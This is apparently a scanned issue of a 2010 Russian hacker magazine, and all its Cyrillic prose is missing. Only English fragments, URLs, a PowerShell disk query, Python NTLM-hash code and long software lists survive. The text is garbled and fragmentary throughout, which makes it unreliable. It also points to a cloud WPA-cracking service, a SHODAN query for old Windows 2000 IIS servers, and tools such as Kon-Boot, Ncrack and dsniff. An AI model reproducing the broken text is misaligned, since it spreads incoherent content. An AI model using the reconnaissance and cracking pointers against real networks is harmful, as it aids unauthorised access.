BinfDiff (www.zynamics.com/bindiff.html)
TurboDiff (corelabs.coresecurity.com/index.p
hp?module=Wiki&action=view&type=tool&nam
e=turbodiff)
: , . (*.idb ),
Edit Plugins Turbodiff/Bindiff
compare with,

. ,
.

Q: XSS/CSRF,
JavaScript-. ,
?
A: , , XSS, Javascript
Firefox
+ Firebug + Eventbug.
, Eventbug, ,
. ,
Firebug',
( ,
Firefox - :)).
, :

.
Firebug
Events. ,


UNITS

- , ,
. Eventbug
Firefox 3.6 Firebug 1.5 .
Eventbug -,
getfirebug.com/
releases/eventbug/1.5/eventbug-0.1b4.xpi.
Q: , Linux traceroute
. - ?
A: :).
Fakeroute
(www.thoughtcrime.org/software/fakeroute).
,
. ,
:

traceroute to yyyy (63.199.yy.yyy),


30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms


Fakeroute':
traceroute to yyyy (63.199.yy.yyy),
30 hops max, 38 byte packets
1 xx.xxx.com (172.17.8.1) 0.867 ms
0.713 ms 0.601 ms
2 adsl-64.dsl.snfc21.pacbell.net
(64.165.xxx.xxx) 2.065 ms 1.895 ms
1.777 ms
3 wh243.eop.gov (198.137.241.43)
0.442 ms 0.553 ms 0.42 ms
4 foundation.hq.nasa.gov
(198.116.142.34) 0.442 ms 0.542 ms
0.422 ms
5 yyyy.com (63.199.yy.yyyy) 28.585
ms 26.445 ms 25.489 ms

,

:).
Q:
,
? , .
A: , ,

.
,
,
-.
VPN,


, ,

. , VPN,
, ,

.
WPA-
WPA Cracker (www.wpacracker.
com). 400 , ( 135
),
.
, 17$
WPA
ZIP-.
20 ,
5 . WWW2 SHODAN (www.shodanhq.
com),
(,
Apache).
,
XML ,
. , ,

.
Q:
? :)
A: , www.
malwaredomainlist.com www.malwareurl.
com ,
. : ,
,

( RegMon/FileMon), ,
, .

, .

?
A: PowerShell',
Get-WMIObject Win32_
LogicalDisk. , c:\hostlist.txt,


:

Get-WMIObject Win32_LogicalDisk -filter "DriveType=3" -computer (Get-Content c:\hostlist.txt) |
    Select SystemName,DeviceID,VolumeName,
        @{Name="size(GB)";Expression={"{0:N1}" -f ($_.size/1gb)}},
        @{Name="freespace(GB)";Expression={"{0:N1}" -f ($_.freespace/1gb)}} |
    Out-GridView

, .
Q: MySQL SQL Server?
A: -

,
.
, MySQL
SQL Server.
,
Microsoft
Sql Server Migration Assistant for MySQL (bit.
ly/8peZcm).
Q: HD-.
( ), .
:

Q: NTLM-,

. -

A: Python', , ,

A: AVI-Mux GUI (www.


alexander-noe.com/video/amg) , .
:
;
( generate data source);
( Drag'n'Drop') ;
Start,
.

. z

:
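import hashlib, binascii
# NTLM hash: MD4 over the UTF-16LE encoded password
# (md4 is available only if the underlying OpenSSL build provides it)
hash = hashlib.new('md4', "thisismyhashvalue".encode('utf-16le')).digest()
print(binascii.hexlify(hash).decode())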

Q:
(30
, ).

HDD, -


>Net
AnalogX LinkExaminer 1.01
Feed Notifier 2.2
Gbridge 2.0
Http File Server 2.2f
mRemote 1.63
PrimeDesktop Beta 1.0
SmartCode VNC Manager 5.5

>Multimedia
AIMP 2.61.560
Camtasia Studio 7.0.0
CDBurnerXP 4.3.0
Faceworx 1.0
Fotosketcher 1.96
Foxit Reader 3.2.1
LEGO Digital Designer 3.0.11
MetatOGGer 3.12
Miro 3.0
SeeMonkey Demo
Tableau Public 5.1
Teemoon Video Matching 1.0.5
Wondershare PPT2Video Free
YoWindow 2.0

>Misc
7 Taskbar Thumbnail Customizer
Agent Ransack 2010
Ant Renamer 2.10.0
BatteryCare 0.9.7.10
CodySafe
Desk Drive 1.8.2
Duplicate Music Files Finder 1.6
ExQueues Shell Queue 0.3.10
Keys Extender r12
Launchy 2.5
LogViewer Pro 1.8.0
Moo0 RightClicker 1.38
TreeSize Free 2.4
Ultimate Windows Tweaker 2.1
UNetbootin 4.29
winPenPack Flash Essential 3.6

>Games
Cheat Engine 5.6
Construct 0.99.62
Hedgewars 0.9.13
Souptoys 1.6.0.8
Engine Development Kit 1.9.1

>>WINDOWS
>>Development
ILMerge
JRE 6u19
Microsoft Application Verifier 4.0
Rad Software Regular Expression
Designer v1.4
SciTE 2.10
SQLite Expert Personal 2.4.12
SQLyog 8.32
Sublime Text 1.3
TreeSize Free 2.4
UltraEdit 16.00
Visual Paradigm for UML 7.2
Community Edition

>>UNIX
>Desktop
Amarok 2.3
Nairo-compmgr 0.3.0
Clementine 0.2
DirSync Pro 1.24
Exaile 0.3.1
FBReader 0.12.9
Gaupol 0.15.1
gLabels 2.2.7
Gnumeric 1.10
KMPlayer 0.11.2
mhWaveEdit 1.4.18
OGMRip 0.13.4
Openbox 3.4.11.1
OpenShot 1.1
Pinta 0.2
RecordStream 0.9.2
Scribus 1.3.6
Simple Movie Catalog 1.3.0
Smb4k 0.10.6
TeXmacs 1.0.7.4
VK_search 0.1.0

>System
Auslogics Disk Defrag 3.1.4
Comodo Time Machine 2.6.1
DLL Archive 1.01
Double Driver 3.0
Driver Magician Lite 3.49
ImDisk Virtual Disk Driver 1.2.8
Open Hardware Monitor 0.1.28
Parted Magic 4.9
PortMapper 1.04
Process Explorer 12.01
Software Informer 1.0.5
VirtualBox 3.1.6
ZeuApp 1.4

>Security
CHScanner 0.9.8.1
Digital Forensics Framework 0.5.0
Eraser 6.0.6
FSF 0.7.3.9
Kon-Boot 1.1
Nmap 5.30BETA1
OWASP CSRFTester 1.0
PenTBox 1.3.2
Plecost 0.2.2-8
Scalp 0.4
SIP Inspector 1.0
StreamArmor v1
Toolza 1.0
VASTO beta
w3af 1.0rc3
WebCastellum 1.8.3
WebRaider 0.2.3.8
Websecurify 0.5
XSSer 0.4

StrongDC++ 2.41
TeamViewer 5.0.8
TightVNC 2.0 Beta 1
WinDump 3.9.5
WinPcap 4.1.1

>Security
ClamAV 0.95.3
Dnswall 0.1.4
Dradis 2.5.1
Dsniff 2.3
Flint
HnTool
Lshell 0.9.10
Ncrack 0.01a
OpenSSL 1.0.0
Passwdqc 1.2.1
Pyscanlogd 0.5
Ratproxy 1.58
Skipfish 1.26b
Sqlmap 0.8
Stunnel 4.32
Surfjack 0.2b
Ubitack

>Net
0MQ 2.0.6
Darkstat 3.0.713
EisKaltDC++ 2.0
elFinder 1.1
Google Chrome 5.0.342.7 Beta
Instantbird 0.1.3
Khal 0.0.1
Miro 3.0.0
Mozilla Firefox 3.6.2
Mpop 1.0.20
Opera 10.51
pyAggr3g470r
Rekonq 0.4.0
Retroshare 0.5.0
Rspamd 0.2.9
rTorrent 0.8.6
Rutorrent 3.0
Sharktorrent 0.2.0.4
Twitim 1.4.2
Uget 1.5.0.3

>Games
SuperTux 0.3.3

>Devel
Android NDK r3
BPython 0.9.6.2
C++ Sockets Library 2.3.9.2
GDB 7.1
GSQL 0.2.2
GTK+ 2.20.0
libimobiledevice 1.0.0
libpng 1.4.1
libtorrent 0.14.9
nwcc 0.8.1
Octave 3.2.4
Parrot 2.2.0
PyInstaller 1.4
PyPy 1.2
Python 2.6.5
Redcar 0.3.4dev
SolarPHP 1.0
Squeak 4.0
Titanium 1.0
ZeroC ICE 3.4

>
Damn Vulnerable App 1.0.6
moth 0.6
Mutillidae 1.3
SecuriBench .91a
VMvicnum 1.4
WebGoat 5.2
WebMaven 1.01

>X-distr
NetBSD 5.0.2
System Rescue CD 1.5.0

>System
Ailurus 10.03.2
ATI Catalyst 10.3
Fio 1.38
Grep 2.6
Install Kernel 0.9.4
Linux From Scratch 6.6
Linux Kernel 2.6.33.1
Mdadm 2.6.9
Mirmon 2.3
NTFS-3G 2010.3.6
nVidia 195.36.15
Synchrorep 1.4.5
Tar 1.23
VirtualBox 3.1.6
Wine 1.1.41
XNeur+gXNeur 0.9.8
Yum 3.2.27

>Server
Apache 2.2.15
BIND 9.7.0
CUPS 1.4.2
DHCP 4.1.1
Freeradius 2.1.8
Lighttpd 1.4.26
Monkeyd 0.9.3
MySQL 5.1.45
NFS-Ganesha 0.99.63
OpenLDAP 2.4.21
OpenSSH 5.4
OpenVPN 2.1.1
Postfix 2.7.0
PowerDNS 3.2
Pure-ftpd 1.0.29
RabbIT 4.5
Samba 3.5
Squid 3.0.STABLE25
Tnftpd 20100324
Vsftpd 2.2.2

VMvicnum 14
Webpentools 0.1
Yummy

05(136) 2010

UNITS

HTTP:// WWW2

WAYBACK MACHINE
web.archive.org

SHODAN

www.shodanhq.com
Google, , ? SHODAN . / ,
.
( , , FTP/
Telnet/SSH-) , - . ,
, Apache, Apache
. : apache
2.2.3 . ,
country, hostname, net, os, port. , ,
ISS, :
Microsoft IIS os:"windows 2000" country:US.


Linux

RECONSTRUCTOR

- ,
, -
, . -,
Goolge . -, Wayback Machine, ,
. ,
, ,
. , ,
Energizer ( MEGANEWS),
Wayback Machine,

.

MOCKINGBIRD

www.reconstructor.org www.gomockingbird.com
WWW2 SUSE Studio (susestudio.
com) SUSE Linux.
Reconstructor
Ubuntu Debian. Linux,
. ,
, , ,
. Linux
, .



-, Axure RP
(www.axure.com). ,
, , .
mockingbird,
-. .
.
PNG/PDF .
